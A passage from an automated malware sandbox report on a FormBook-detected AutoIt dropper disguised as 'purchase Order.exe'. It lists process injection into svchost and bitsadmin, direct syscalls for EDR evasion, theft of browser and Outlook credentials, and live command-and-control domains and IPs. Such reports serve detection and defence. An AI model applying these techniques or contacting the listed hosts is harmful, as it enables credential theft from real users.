                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730887 mov eax, dword ptr fs:[00000030h]2_2_03730887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h]2_2_0375AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h]2_2_0375AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2F60 mov eax, dword ptr fs:[00000030h]2_2_037D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2F60 mov eax, dword ptr fs:[00000030h]2_2_037D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]2_2_0372CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]2_2_0372CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]2_2_0372CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]2_2_0372CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]2_2_0372CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CF50 mov eax, dword ptr fs:[00000030h]2_2_0372CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CF50 mov eax, dword ptr fs:[00000030h]2_2_0376CF50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D0F50 mov eax, dword ptr fs:[00000030h]2_2_037D0F50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]2_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]2_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]2_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F40 mov eax, dword ptr fs:[00000030h]2_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4F42 mov eax, dword ptr fs:[00000030h]2_2_037D4F42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EF28 mov eax, dword ptr fs:[00000030h]2_2_0375EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732F12 mov eax, dword ptr fs:[00000030h]2_2_03732F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804FE7 mov eax, dword ptr fs:[00000030h]2_2_03804FE7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CF1F mov eax, dword ptr fs:[00000030h]2_2_0376CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E6F00 mov eax, dword ptr fs:[00000030h]2_2_037E6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h]2_2_03770FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h]2_2_03770FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h]2_2_03770FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770FF6 mov eax, dword ptr fs:[00000030h]2_2_03770FF6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E6FF7 mov eax, dword ptr fs:[00000030h]2_2_037E6FF7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE0 mov eax, dword ptr fs:[00000030h]2_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE0 mov eax, dword ptr fs:[00000030h]2_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372EFD8 mov eax, dword ptr fs:[00000030h]2_2_0372EFD8
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C7A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00C7A66C
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C68189 SetUnhandledExceptionFilter,0_2_00C68189
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C681AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C681AC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtQueryValueKey: Direct from: 0x77542BECJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtClose: Direct from: 0x77542B6C
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtOpenKeyEx: Direct from: 0x77543C9CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread register set: target process: 2376Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread APC queued: target process: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B61008Jump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C7B106 LogonUserW,0_2_00C7B106
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C43D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C43D19
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C8411C SendInput,keybd_event,0_2_00C8411C
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C874E7 mouse_event,0_2_00C874E7
                Source: C:\Users\user\Desktop\purchase Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\purchase Order.exe"Jump to behavior
                Source: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C7A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00C7A66C
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C871FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C871FA
                Source: McqlvggSSSjC.exe, 00000004.00000000.1543566693.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3221766398.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3221914905.0000000001A11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: purchase Order.exe, McqlvggSSSjC.exe, 00000004.00000000.1543566693.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3221766398.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3221914905.0000000001A11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: McqlvggSSSjC.exe, 00000004.00000000.1543566693.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3221766398.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3221914905.0000000001A11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: purchase Order.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: McqlvggSSSjC.exe, 00000004.00000000.1543566693.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3221766398.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, McqlvggSSSjC.exe, 00000006.00000002.3221914905.0000000001A11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C665C4 cpuid 0_2_00C665C4
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C9091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00C9091D
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00CBB340 GetUserNameW,0_2_00CBB340
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C71E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00C71E8E
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C5DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C5DDC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3220556041.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3221831734.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3223837018.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1621550666.00000000036A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1621140733.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3221901716.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3222030300.0000000002E50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1622264740.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: purchase Order.exeBinary or memory string: WIN_81
                Source: purchase Order.exeBinary or memory string: WIN_XP
                Source: purchase Order.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: purchase Order.exeBinary or memory string: WIN_XPe
                Source: purchase Order.exeBinary or memory string: WIN_VISTA
                Source: purchase Order.exeBinary or memory string: WIN_7
                Source: purchase Order.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3220556041.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3221831734.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3223837018.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1621550666.00000000036A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1621140733.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3221901716.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3222030300.0000000002E50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1622264740.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C98C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00C98C4F
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C9923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00C9923B
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                3
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                11
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                2
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model11
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets251
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561730 Sample: purchase Order.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 28 www.soainsaat.xyz 2->28 30 www.amayavp.xyz 2->30 32 9 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 6 other signatures 2->50 10 purchase Order.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->64 66 Writes to foreign memory regions 10->66 68 Maps a DLL or memory area into another process 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 McqlvggSSSjC.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 bitsadmin.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 McqlvggSSSjC.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.amayavp.xyz 185.27.134.144, 49987, 49988, 49989 WILDCARD-ASWildcardUKLimitedGB United Kingdom 22->34 36 www.xcvbj.asia 149.88.81.190, 49883, 49889, 49895 SAIC-ASUS United States 22->36 38 6 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                purchase Order.exe58%ReversingLabsWin32.Trojan.AutoitInject
                purchase Order.exe63%VirustotalBrowse
                purchase Order.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                www.vayui.top2%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://www.laohub10.net/sgdd/0%Avira URL Cloudsafe
                http://server/get.asp0%Avira URL Cloudsafe
                http://www.t91rl7.pro0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/0%Avira URL Cloudsafe
                http://www.soainsaat.xyz/rum2/0%Avira URL Cloudsafe
                http://www.xcvbj.asia/rq1s/0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/o362/0%Avira URL Cloudsafe
                http://www.t91rl7.pro/jhb8/0%Avira URL Cloudsafe
                http://www.vayui.top/vg0z/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.vayui.top
                172.67.145.234
